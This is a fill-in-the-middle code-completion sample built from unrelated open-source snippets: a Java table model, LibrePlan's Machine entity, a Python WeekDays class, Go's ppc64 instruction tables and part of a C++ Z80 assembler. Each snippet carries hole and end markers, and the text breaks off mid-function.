d = new DirOpt(d.dir, (Boolean) val, d.recursive);
break;
case 2:
d = new DirOpt(d.dir, d.enabled, (Boolean) val);
break;
default:
throw new RuntimeException();
}
dirs.set(row, d);
}
}<|fim▁end|> | fireTableDataChanged();
}
public DirOpt getDir (int row) {
|
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>import { DataSecurity } from "../../";
<|fim▁hole|>export = DataSecurity;<|fim▁end|> | |
<|file_name|>Machine.java<|end_file_name|><|fim▁begin|>/*
* This file is part of LibrePlan
*
* Copyright (C) 2009-2010 Fundación para o Fomento da Calidade Industrial e
* Desenvolvemento Tecnolóxico de Galicia
* Copyright (C) 2010-2011 Igalia, S.L.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.libreplan.business.resources.entities;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;
import org.apache.commons.lang3.StringUtils;
import org.hibernate.validator.constraints.NotEmpty;
import javax.validation.Valid;
/**
 * Represents a machine entity. It is another type of work resource.
*
* @author Javier Moran Rua <[email protected]>
* @author Fernando Bellas Permuy <[email protected]>
*/
public class Machine extends Resource {
private final static ResourceEnum type = ResourceEnum.MACHINE;
private String name;
private String description;
private Set<MachineWorkersConfigurationUnit> configurationUnits = new HashSet<>();
@Valid
public Set<MachineWorkersConfigurationUnit> getConfigurationUnits() {
return Collections.unmodifiableSet(configurationUnits);
}
public void addMachineWorkersConfigurationUnit(MachineWorkersConfigurationUnit unit) {
configurationUnits.add(unit);
}
public void removeMachineWorkersConfigurationUnit(MachineWorkersConfigurationUnit unit) {
configurationUnits.remove(unit);
}
public static Machine createUnvalidated(String code, String name, String description) {
Machine machine = create(new Machine(), code);
machine.name = name;
machine.description = description;
return machine;
}
public void updateUnvalidated(String name, String description) {
if (!StringUtils.isBlank(name)) {
this.name = name;
}
if (!StringUtils.isBlank(description)) {
this.description = description;
}
}<|fim▁hole|> */
protected Machine() {}
public static Machine create() {
return create(new Machine());
}
public static Machine create(String code) {
return create(new Machine(), code);
}
@NotEmpty(message = "machine name not specified")
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getDescription() {
return description;
}
public String getShortDescription() {
return name + " (" + getCode() + ")";
}
public void setDescription(String description) {
this.description = description;
}
@Override
protected boolean isCriterionSatisfactionOfCorrectType(CriterionSatisfaction c) {
return c.getResourceType().equals(ResourceEnum.MACHINE);
}
@Override
public ResourceEnum getType() {
return type;
}
@Override
public String toString() {
return String.format("MACHINE: %s", name);
}
@Override
public String getHumanId() {
return name;
}
}<|fim▁end|> |
/**
* Used by Hibernate. Do not use! |
<|file_name|>weekdays.py<|end_file_name|><|fim▁begin|>import six
from sqlalchemy_utils.utils import str_coercible
from .weekday import WeekDay
@str_coercible
class WeekDays(object):
def __init__(self, bit_string_or_week_days):
if isinstance(bit_string_or_week_days, six.string_types):
self._days = set()
if len(bit_string_or_week_days) != WeekDay.NUM_WEEK_DAYS:
raise ValueError(
'Bit string must be {0} characters long.'.format(
WeekDay.NUM_WEEK_DAYS
)
)
for index, bit in enumerate(bit_string_or_week_days):
if bit not in '01':
raise ValueError(
'Bit string may only contain zeroes and ones.'
)<|fim▁hole|> self._days.add(WeekDay(index))
elif isinstance(bit_string_or_week_days, WeekDays):
self._days = bit_string_or_week_days._days
else:
self._days = set(bit_string_or_week_days)
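    # Usage sketch (assuming a seven-character bit string where index 0 is
    # the first weekday): WeekDays('1000001') contains WeekDay(0) and
    # WeekDay(6) and round-trips through as_bit_string() back to '1000001'.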
def __eq__(self, other):
if isinstance(other, WeekDays):
return self._days == other._days
elif isinstance(other, six.string_types):
return self.as_bit_string() == other
else:
return NotImplemented
def __iter__(self):
for day in sorted(self._days):
yield day
def __contains__(self, value):
return value in self._days
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
self.as_bit_string()
)
def __unicode__(self):
return u', '.join(six.text_type(day) for day in self)
def as_bit_string(self):
return ''.join(
'1' if WeekDay(index) in self._days else '0'
for index in six.moves.xrange(WeekDay.NUM_WEEK_DAYS)
)<|fim▁end|> | if bit == '1': |
<|file_name|>prog.go<|end_file_name|><|fim▁begin|>// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package ppc64
import (
"cmd/compile/internal/gc"
"cmd/internal/obj"
"cmd/internal/obj/ppc64"
)
const (
LeftRdwr uint32 = gc.LeftRead | gc.LeftWrite
RightRdwr uint32 = gc.RightRead | gc.RightWrite
)
// This table gives the basic information about instruction
// generated by the compiler and processed in the optimizer.
// See opt.h for bit definitions.
//
// Instructions not generated need not be listed.
// As an exception to that rule, we typically write down all the
// size variants of an operation even if we just use a subset.
//
// The table is formatted for 8-space tabs.
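//
// For example, the ppc64.AADD entry below reads as: a quad-sized
// instruction that reads its left operand and its second register operand
// and writes its right operand.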
var progtable = [ppc64.ALAST]obj.ProgInfo{
obj.ATYPE: {Flags: gc.Pseudo | gc.Skip},
obj.ATEXT: {Flags: gc.Pseudo},
obj.AFUNCDATA: {Flags: gc.Pseudo},
obj.APCDATA: {Flags: gc.Pseudo},
obj.AUNDEF: {Flags: gc.Break},
obj.AUSEFIELD: {Flags: gc.OK},
obj.ACHECKNIL: {Flags: gc.LeftRead},
obj.AVARDEF: {Flags: gc.Pseudo | gc.RightWrite},
obj.AVARKILL: {Flags: gc.Pseudo | gc.RightWrite},
obj.AVARLIVE: {Flags: gc.Pseudo | gc.LeftRead},
// NOP is an internal no-op that also stands
// for USED and SET annotations, not the Power opcode.
obj.ANOP: {Flags: gc.LeftRead | gc.RightWrite},
// Integer
ppc64.AADD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASUB: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ANEG: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AAND: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AOR: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AXOR: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULLD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULLW: {Flags: gc.SizeL | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULHD: {Flags: gc.SizeL | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AMULHDU: {Flags: gc.SizeL | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ADIVD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ADIVDU: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASLD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASRD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ASRAD: {Flags: gc.SizeQ | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.ACMP: {Flags: gc.SizeQ | gc.LeftRead | gc.RightRead},
ppc64.ACMPU: {Flags: gc.SizeQ | gc.LeftRead | gc.RightRead},
ppc64.ATD: {Flags: gc.SizeQ | gc.RightRead},
// Floating point.
ppc64.AFADD: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFADDS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFSUB: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFSUBS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFMUL: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFMULS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFDIV: {Flags: gc.SizeD | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFDIVS: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFCTIDZ: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFCFID: {Flags: gc.SizeF | gc.LeftRead | gc.RegRead | gc.RightWrite},
ppc64.AFCMPU: {Flags: gc.SizeD | gc.LeftRead | gc.RightRead},
ppc64.AFRSP: {Flags: gc.SizeD | gc.LeftRead | gc.RightWrite | gc.Conv},
// Moves
ppc64.AMOVB: {Flags: gc.SizeB | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVBU: {Flags: gc.SizeB | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv | gc.PostInc},
ppc64.AMOVBZ: {Flags: gc.SizeB | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVH: {Flags: gc.SizeW | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVHU: {Flags: gc.SizeW | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv | gc.PostInc},
ppc64.AMOVHZ: {Flags: gc.SizeW | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVW: {Flags: gc.SizeL | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
// there is no AMOVWU.
ppc64.AMOVWZU: {Flags: gc.SizeL | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv | gc.PostInc},
ppc64.AMOVWZ: {Flags: gc.SizeL | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AMOVD: {Flags: gc.SizeQ | gc.LeftRead | gc.RightWrite | gc.Move},
ppc64.AMOVDU: {Flags: gc.SizeQ | gc.LeftRead | gc.RightWrite | gc.Move | gc.PostInc},
ppc64.AFMOVS: {Flags: gc.SizeF | gc.LeftRead | gc.RightWrite | gc.Move | gc.Conv},
ppc64.AFMOVD: {Flags: gc.SizeD | gc.LeftRead | gc.RightWrite | gc.Move},
// Jumps
ppc64.ABR: {Flags: gc.Jump | gc.Break},
ppc64.ABL: {Flags: gc.Call},
ppc64.ABEQ: {Flags: gc.Cjmp},
ppc64.ABNE: {Flags: gc.Cjmp},
ppc64.ABGE: {Flags: gc.Cjmp},
ppc64.ABLT: {Flags: gc.Cjmp},
ppc64.ABGT: {Flags: gc.Cjmp},
ppc64.ABLE: {Flags: gc.Cjmp},
obj.ARET: {Flags: gc.Break},
obj.ADUFFZERO: {Flags: gc.Call},
obj.ADUFFCOPY: {Flags: gc.Call},
}
var initproginfo_initialized int
func initproginfo() {
var addvariant = []int{V_CC, V_V, V_CC | V_V}
if initproginfo_initialized != 0 {
return
}
initproginfo_initialized = 1
// Perform one-time expansion of instructions in progtable to
// their CC, V, and VCC variants
var as2 int
var i int
var variant int
for as := int(0); as < len(progtable); as++ {
if progtable[as].Flags == 0 {
continue
}
variant = as2variant(as)
for i = 0; i < len(addvariant); i++ {
as2 = variant2as(as, variant|addvariant[i])<|fim▁hole|> }
}
}
}
func proginfo(p *obj.Prog) {
initproginfo()
info := &p.Info
*info = progtable[p.As]
if info.Flags == 0 {
gc.Fatalf("proginfo: unknown instruction %v", p)
}
if (info.Flags&gc.RegRead != 0) && p.Reg == 0 {
info.Flags &^= gc.RegRead
info.Flags |= gc.RightRead /*CanRegRead |*/
}
if (p.From.Type == obj.TYPE_MEM || p.From.Type == obj.TYPE_ADDR) && p.From.Reg != 0 {
info.Regindex |= RtoB(int(p.From.Reg))
if info.Flags&gc.PostInc != 0 {
info.Regset |= RtoB(int(p.From.Reg))
}
}
if (p.To.Type == obj.TYPE_MEM || p.To.Type == obj.TYPE_ADDR) && p.To.Reg != 0 {
info.Regindex |= RtoB(int(p.To.Reg))
if info.Flags&gc.PostInc != 0 {
info.Regset |= RtoB(int(p.To.Reg))
}
}
if p.From.Type == obj.TYPE_ADDR && p.From.Sym != nil && (info.Flags&gc.LeftRead != 0) {
info.Flags &^= gc.LeftRead
info.Flags |= gc.LeftAddr
}
if p.As == obj.ADUFFZERO {
info.Reguse |= 1<<0 | RtoB(ppc64.REG_R3)
info.Regset |= RtoB(ppc64.REG_R3)
}
if p.As == obj.ADUFFCOPY {
// TODO(austin) Revisit when duffcopy is implemented
info.Reguse |= RtoB(ppc64.REG_R3) | RtoB(ppc64.REG_R4) | RtoB(ppc64.REG_R5)
info.Regset |= RtoB(ppc64.REG_R3) | RtoB(ppc64.REG_R4)
}
}
// Instruction variants table. Initially this contains entries only
// for the "base" form of each instruction. On the first call to
// as2variant or variant2as, we'll add the variants to the table.
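//
// Sketch of the mapping: varianttable[ppc64.AADD] lists the base form plus
// its CC, V and VCC variants, so variant2as(ppc64.AADD, V_CC) yields
// ppc64.AADDCC and as2variant(ppc64.AADDCC) recovers V_CC.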
var varianttable = [ppc64.ALAST][4]int{
ppc64.AADD: {ppc64.AADD, ppc64.AADDCC, ppc64.AADDV, ppc64.AADDVCC},
ppc64.AADDC: {ppc64.AADDC, ppc64.AADDCCC, ppc64.AADDCV, ppc64.AADDCVCC},
ppc64.AADDE: {ppc64.AADDE, ppc64.AADDECC, ppc64.AADDEV, ppc64.AADDEVCC},
ppc64.AADDME: {ppc64.AADDME, ppc64.AADDMECC, ppc64.AADDMEV, ppc64.AADDMEVCC},
ppc64.AADDZE: {ppc64.AADDZE, ppc64.AADDZECC, ppc64.AADDZEV, ppc64.AADDZEVCC},
ppc64.AAND: {ppc64.AAND, ppc64.AANDCC, 0, 0},
ppc64.AANDN: {ppc64.AANDN, ppc64.AANDNCC, 0, 0},
ppc64.ACNTLZD: {ppc64.ACNTLZD, ppc64.ACNTLZDCC, 0, 0},
ppc64.ACNTLZW: {ppc64.ACNTLZW, ppc64.ACNTLZWCC, 0, 0},
ppc64.ADIVD: {ppc64.ADIVD, ppc64.ADIVDCC, ppc64.ADIVDV, ppc64.ADIVDVCC},
ppc64.ADIVDU: {ppc64.ADIVDU, ppc64.ADIVDUCC, ppc64.ADIVDUV, ppc64.ADIVDUVCC},
ppc64.ADIVW: {ppc64.ADIVW, ppc64.ADIVWCC, ppc64.ADIVWV, ppc64.ADIVWVCC},
ppc64.ADIVWU: {ppc64.ADIVWU, ppc64.ADIVWUCC, ppc64.ADIVWUV, ppc64.ADIVWUVCC},
ppc64.AEQV: {ppc64.AEQV, ppc64.AEQVCC, 0, 0},
ppc64.AEXTSB: {ppc64.AEXTSB, ppc64.AEXTSBCC, 0, 0},
ppc64.AEXTSH: {ppc64.AEXTSH, ppc64.AEXTSHCC, 0, 0},
ppc64.AEXTSW: {ppc64.AEXTSW, ppc64.AEXTSWCC, 0, 0},
ppc64.AFABS: {ppc64.AFABS, ppc64.AFABSCC, 0, 0},
ppc64.AFADD: {ppc64.AFADD, ppc64.AFADDCC, 0, 0},
ppc64.AFADDS: {ppc64.AFADDS, ppc64.AFADDSCC, 0, 0},
ppc64.AFCFID: {ppc64.AFCFID, ppc64.AFCFIDCC, 0, 0},
ppc64.AFCTID: {ppc64.AFCTID, ppc64.AFCTIDCC, 0, 0},
ppc64.AFCTIDZ: {ppc64.AFCTIDZ, ppc64.AFCTIDZCC, 0, 0},
ppc64.AFCTIW: {ppc64.AFCTIW, ppc64.AFCTIWCC, 0, 0},
ppc64.AFCTIWZ: {ppc64.AFCTIWZ, ppc64.AFCTIWZCC, 0, 0},
ppc64.AFDIV: {ppc64.AFDIV, ppc64.AFDIVCC, 0, 0},
ppc64.AFDIVS: {ppc64.AFDIVS, ppc64.AFDIVSCC, 0, 0},
ppc64.AFMADD: {ppc64.AFMADD, ppc64.AFMADDCC, 0, 0},
ppc64.AFMADDS: {ppc64.AFMADDS, ppc64.AFMADDSCC, 0, 0},
ppc64.AFMOVD: {ppc64.AFMOVD, ppc64.AFMOVDCC, 0, 0},
ppc64.AFMSUB: {ppc64.AFMSUB, ppc64.AFMSUBCC, 0, 0},
ppc64.AFMSUBS: {ppc64.AFMSUBS, ppc64.AFMSUBSCC, 0, 0},
ppc64.AFMUL: {ppc64.AFMUL, ppc64.AFMULCC, 0, 0},
ppc64.AFMULS: {ppc64.AFMULS, ppc64.AFMULSCC, 0, 0},
ppc64.AFNABS: {ppc64.AFNABS, ppc64.AFNABSCC, 0, 0},
ppc64.AFNEG: {ppc64.AFNEG, ppc64.AFNEGCC, 0, 0},
ppc64.AFNMADD: {ppc64.AFNMADD, ppc64.AFNMADDCC, 0, 0},
ppc64.AFNMADDS: {ppc64.AFNMADDS, ppc64.AFNMADDSCC, 0, 0},
ppc64.AFNMSUB: {ppc64.AFNMSUB, ppc64.AFNMSUBCC, 0, 0},
ppc64.AFNMSUBS: {ppc64.AFNMSUBS, ppc64.AFNMSUBSCC, 0, 0},
ppc64.AFRES: {ppc64.AFRES, ppc64.AFRESCC, 0, 0},
ppc64.AFRSP: {ppc64.AFRSP, ppc64.AFRSPCC, 0, 0},
ppc64.AFRSQRTE: {ppc64.AFRSQRTE, ppc64.AFRSQRTECC, 0, 0},
ppc64.AFSEL: {ppc64.AFSEL, ppc64.AFSELCC, 0, 0},
ppc64.AFSQRT: {ppc64.AFSQRT, ppc64.AFSQRTCC, 0, 0},
ppc64.AFSQRTS: {ppc64.AFSQRTS, ppc64.AFSQRTSCC, 0, 0},
ppc64.AFSUB: {ppc64.AFSUB, ppc64.AFSUBCC, 0, 0},
ppc64.AFSUBS: {ppc64.AFSUBS, ppc64.AFSUBSCC, 0, 0},
ppc64.AMTFSB0: {ppc64.AMTFSB0, ppc64.AMTFSB0CC, 0, 0},
ppc64.AMTFSB1: {ppc64.AMTFSB1, ppc64.AMTFSB1CC, 0, 0},
ppc64.AMULHD: {ppc64.AMULHD, ppc64.AMULHDCC, 0, 0},
ppc64.AMULHDU: {ppc64.AMULHDU, ppc64.AMULHDUCC, 0, 0},
ppc64.AMULHW: {ppc64.AMULHW, ppc64.AMULHWCC, 0, 0},
ppc64.AMULHWU: {ppc64.AMULHWU, ppc64.AMULHWUCC, 0, 0},
ppc64.AMULLD: {ppc64.AMULLD, ppc64.AMULLDCC, ppc64.AMULLDV, ppc64.AMULLDVCC},
ppc64.AMULLW: {ppc64.AMULLW, ppc64.AMULLWCC, ppc64.AMULLWV, ppc64.AMULLWVCC},
ppc64.ANAND: {ppc64.ANAND, ppc64.ANANDCC, 0, 0},
ppc64.ANEG: {ppc64.ANEG, ppc64.ANEGCC, ppc64.ANEGV, ppc64.ANEGVCC},
ppc64.ANOR: {ppc64.ANOR, ppc64.ANORCC, 0, 0},
ppc64.AOR: {ppc64.AOR, ppc64.AORCC, 0, 0},
ppc64.AORN: {ppc64.AORN, ppc64.AORNCC, 0, 0},
ppc64.AREM: {ppc64.AREM, ppc64.AREMCC, ppc64.AREMV, ppc64.AREMVCC},
ppc64.AREMD: {ppc64.AREMD, ppc64.AREMDCC, ppc64.AREMDV, ppc64.AREMDVCC},
ppc64.AREMDU: {ppc64.AREMDU, ppc64.AREMDUCC, ppc64.AREMDUV, ppc64.AREMDUVCC},
ppc64.AREMU: {ppc64.AREMU, ppc64.AREMUCC, ppc64.AREMUV, ppc64.AREMUVCC},
ppc64.ARLDC: {ppc64.ARLDC, ppc64.ARLDCCC, 0, 0},
ppc64.ARLDCL: {ppc64.ARLDCL, ppc64.ARLDCLCC, 0, 0},
ppc64.ARLDCR: {ppc64.ARLDCR, ppc64.ARLDCRCC, 0, 0},
ppc64.ARLDMI: {ppc64.ARLDMI, ppc64.ARLDMICC, 0, 0},
ppc64.ARLWMI: {ppc64.ARLWMI, ppc64.ARLWMICC, 0, 0},
ppc64.ARLWNM: {ppc64.ARLWNM, ppc64.ARLWNMCC, 0, 0},
ppc64.ASLD: {ppc64.ASLD, ppc64.ASLDCC, 0, 0},
ppc64.ASLW: {ppc64.ASLW, ppc64.ASLWCC, 0, 0},
ppc64.ASRAD: {ppc64.ASRAD, ppc64.ASRADCC, 0, 0},
ppc64.ASRAW: {ppc64.ASRAW, ppc64.ASRAWCC, 0, 0},
ppc64.ASRD: {ppc64.ASRD, ppc64.ASRDCC, 0, 0},
ppc64.ASRW: {ppc64.ASRW, ppc64.ASRWCC, 0, 0},
ppc64.ASUB: {ppc64.ASUB, ppc64.ASUBCC, ppc64.ASUBV, ppc64.ASUBVCC},
ppc64.ASUBC: {ppc64.ASUBC, ppc64.ASUBCCC, ppc64.ASUBCV, ppc64.ASUBCVCC},
ppc64.ASUBE: {ppc64.ASUBE, ppc64.ASUBECC, ppc64.ASUBEV, ppc64.ASUBEVCC},
ppc64.ASUBME: {ppc64.ASUBME, ppc64.ASUBMECC, ppc64.ASUBMEV, ppc64.ASUBMEVCC},
ppc64.ASUBZE: {ppc64.ASUBZE, ppc64.ASUBZECC, ppc64.ASUBZEV, ppc64.ASUBZEVCC},
ppc64.AXOR: {ppc64.AXOR, ppc64.AXORCC, 0, 0},
}
var initvariants_initialized int
func initvariants() {
if initvariants_initialized != 0 {
return
}
initvariants_initialized = 1
var j int
for i := int(0); i < len(varianttable); i++ {
if varianttable[i][0] == 0 {
// Instruction has no variants
varianttable[i][0] = i
continue
}
// Copy base form to other variants
if varianttable[i][0] == i {
for j = 0; j < len(varianttable[i]); j++ {
varianttable[varianttable[i][j]] = varianttable[i]
}
}
}
}
// as2variant returns the variant (V_*) flags of instruction as.
func as2variant(as int) int {
initvariants()
for i := int(0); i < len(varianttable[as]); i++ {
if varianttable[as][i] == as {
return i
}
}
gc.Fatalf("as2variant: instruction %v is not a variant of itself", obj.Aconv(as))
return 0
}
// variant2as returns the instruction as with the given variant (V_*) flags.
// If no such variant exists, this returns 0.
func variant2as(as int, flags int) int {
initvariants()
return varianttable[as][flags]
}<|fim▁end|> | if as2 != 0 && progtable[as2].Flags == 0 {
progtable[as2] = progtable[as] |
<|file_name|>z80_assembler.cpp<|end_file_name|><|fim▁begin|>/**
* libz80
* Copyright (C) 2015 David Jolly
* ----------------------
*
* libz80 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* libz80 is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <fstream>
#include "../include/z80.h"
#include "../include/z80_assembler_type.h"
namespace Z80_NS {
namespace Z80_LANG_NS {
#define CODE_COUNT 1
#define CODE_EXTENDED 2
#define CODE_OFFSET 0
#define COND_EXPRESSION_COUNT 3
#define COND_EXPRESSION_OPERAND_LEFT 0
#define COND_EXPRESSION_OPERAND_RIGHT 2
#define COND_EXPRESSION_OPERATOR 1
#define DEFS_EXPRESSION_COUNT 2
#define DEFS_EXPRESSION_OFFSET 1
#define DEFS_EXPRESSION_VALUE_OFFSET 0
#define EXPRESSION_COUNT_MIN 1
#define EXPRESSION_LEFT_OFF 0
#define EXPRESSION_RIGHT_OFF 1
#define IF_CONDITIONAL_COUNT_MAX 3
#define IF_CONDITIONAL_COUNT_MIN 2
#define IF_CONDITIONAL_ID_OFF 0
#define IF_CONDITIONAL_STMT_MAIN_OFF 1
#define IF_CONDITIONAL_STMT_AUX_OFF 2
#define MACRO_CHILD_OFF 0
#define MACRO_COUNT 1
#define OPERATOR_CHILD_OFF 0
#define OPERATOR_COUNT 1
#define UNARY_OPERATOR_CHILD_OFF 0
#define UNARY_OPERATOR_COUNT 1
#define THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT(_EXCEPT_, _TOK_, _VERB_) \
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(_EXCEPT_, \
"%s\n%lu:%s", CHECK_STR(z80_token::as_string(_TOK_)), \
(TOKEN_CONTEXT_ROW((_TOK_).context()) + 1), \
CHECK_STR(z80_token::token_exception_as_string((_TOK_).context(), _VERB_)))
#define THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(_EXCEPT_, _TOK_, _VERB_, _FORMAT_, ...) \
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(_EXCEPT_, _FORMAT_ "\n%lu:%s", __VA_ARGS__, \
(TOKEN_CONTEXT_ROW((_TOK_).context()) + 1), \
CHECK_STR(z80_token::token_exception_as_string((_TOK_).context(), _VERB_)))
bool
operator==(
__in const z80_bin_t &left,
__in const z80_bin_t &right
)
{
bool result;
size_t iter = 0;
TRACE_ENTRY();
result = (&left == &right);
if(!result) {
result = (left.size() == right.size());
if(result) {
for(; iter < left.size(); ++iter) {
if(left.at(iter) != right.at(iter)) {
result = false;
break;
}
}
}
}
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
bool
operator!=(
__in const z80_bin_t &left,
__in const z80_bin_t &right
)
{
bool result;
TRACE_ENTRY();
result = !(left == right);
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
bool
operator==(
__in const z80_lst_t &left,
__in const z80_lst_t &right
)
{
bool result;
z80_lst_t::const_iterator iter, right_iter;
TRACE_ENTRY();
result = (&left == &right);
if(!result) {
result = (left.size() == right.size());
if(result) {
for(iter = left.begin(); iter != left.end(); ++iter) {
right_iter = right.find(iter->first);
if((right_iter == right.end())
|| (right_iter->second != iter->second)) {
result = false;
break;
}
}
}
}
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
bool
operator!=(
__in const z80_lst_t &left,
__in const z80_lst_t &right
)
{
bool result;
TRACE_ENTRY();
result = !(left == right);
TRACE_EXIT("Return Value: 0x%x", result);
return result;
}
_z80_assembler::_z80_assembler(
__in_opt const std::string &input,
__in_opt bool is_file
)
{
TRACE_ENTRY();
z80_assembler::set(input, is_file);
TRACE_EXIT("Return Value: 0x%x", 0);
}
_z80_assembler::_z80_assembler(
__in const _z80_assembler &other
) :
z80_parser(other),
m_binary(other.m_binary),
m_identifier_map(other.m_identifier_map),
m_label_map(other.m_label_map)
{
TRACE_ENTRY();
TRACE_EXIT("Return Value: 0x%x", 0);
}
_z80_assembler::~_z80_assembler(void)
{
TRACE_ENTRY();
TRACE_EXIT("Return Value: 0x%x", 0);
}
_z80_assembler &
_z80_assembler::operator=(
__in const _z80_assembler &other
)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
z80_parser::operator=(other);
m_binary = other.m_binary;
m_identifier_map = other.m_identifier_map;
m_label_map = other.m_label_map;
TRACE_EXIT("Return Value: 0x%p", this);
return *this;
}
z80_bin_t
_z80_assembler::binary(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
TRACE_EXIT("Return Value: size: %lu", m_binary.size());
return m_binary;
}
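// render an assembled image as a hex dump; illustrative output
// (the exact hex prefix depends on VALUE_AS_HEX):
//   0000 | 3e 01 32 00 40 ...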
std::string
_z80_assembler::binary_as_string(
__in const z80_bin_t &binary,
__in_opt bool verbose
)
{
size_t iter = 0;
std::stringstream result;
TRACE_ENTRY();
if(verbose) {
result << "Binary size: " << std::setprecision(3)
<< (binary.size() / BYTES_PER_KBYTE)
<< " KB (" << binary.size() << " bytes)"
<< std::endl;
}
for(; iter < binary.size(); ++iter) {
if(!(iter % BLOCK_LEN)) {
if(iter) {
result << std::endl;
}
result << VALUE_AS_HEX(uint16_t, iter) << " |";
}
result << " " << VALUE_AS_HEX(uint8_t, binary.at(iter));
}
TRACE_EXIT("Return Value: %s", CHECK_STR(result.str()));
return result.str();
}
void
_z80_assembler::clear(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
z80_parser::reset();
m_binary.clear();
m_identifier_map.clear();
m_label_map.clear();
TRACE_EXIT("Return Value: 0x%x", 0);
}
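// two-pass assembly: the preprocessor pass expands includes and
// collects label/identifier addresses, then the assembler pass
// emits the byte stream; returns the size of the resulting binary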
size_t
_z80_assembler::discover(void)
{
size_t result;
z80_node_factory_ptr node_fact = NULL;
z80_token_factory_ptr tok_fact = NULL;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
node_fact = z80_node_factory::acquire();
tok_fact = z80_token_factory::acquire();
z80_assembler::clear();
run_preprocessor(tok_fact, node_fact);
run_assembler(tok_fact, node_fact);
result = m_binary.size();
TRACE_EXIT("Return Value: size: %lu", result);
return result;
}
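// emit the opcode bytes for a single command, evaluating and patching
// in the operand where required (with displacement adjustment for
// relative-jump style commands)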
void
_z80_assembler::evaluate_command(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
uint16_t val;
uint32_t code;
z80_token tok;
size_t iter, off;
z80_command_info_comp_t info;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_CODE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_COMMAND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(!tok.length()) {
